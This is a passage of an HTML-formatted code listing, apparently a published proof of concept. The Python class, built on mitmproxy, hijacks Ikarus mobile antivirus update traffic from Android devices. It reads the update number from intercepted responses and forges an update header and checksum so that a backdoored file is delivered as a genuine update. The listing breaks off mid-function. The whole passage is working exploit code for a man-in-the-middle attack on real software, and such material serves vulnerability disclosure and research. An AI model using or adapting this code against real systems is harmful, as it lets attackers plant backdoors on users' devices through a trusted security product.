class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxy<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">platform<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-8\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">libmproxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ProxyServer<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">re<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">struct<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-13\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">zlib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-14\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">bz2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-16\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">IkarusPOC<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Master<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">__init__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Master<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__init__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ikarus<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crc_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">backdoored_file<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-22\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span 
class=\"crayon-e\">win_header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x49\\x4B\\x55\\x50\\x00\\x00\\x00\\x00\\x3C\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;&lt;I&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># update number<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;&lt;I&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crc_file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># checksum<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&quot;\\x00\\x00\\x00\\x00&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Master<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">KeyboardInterrupt<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">shutdown<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">crc_stream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a_string<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a_string<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xFFFFFFFF<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">crc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">some_file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eachLine <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">some_file<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;rb&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">eachLine<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crc_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xFFFFFFFF<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;[*] crc_file&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc_file<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-51\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">handle_request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">hid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">host<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">reply<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">handle_response<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;[*] flow.request.host:&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">host<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-57\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&quot;cgi-bin\/imsa-lite.pl&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;Dalvik&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'User-Agent'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">content<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a1c8f5d60531148303101-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">compile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;antispam[\\s|\\t].*\\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-63\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-65\"><span 
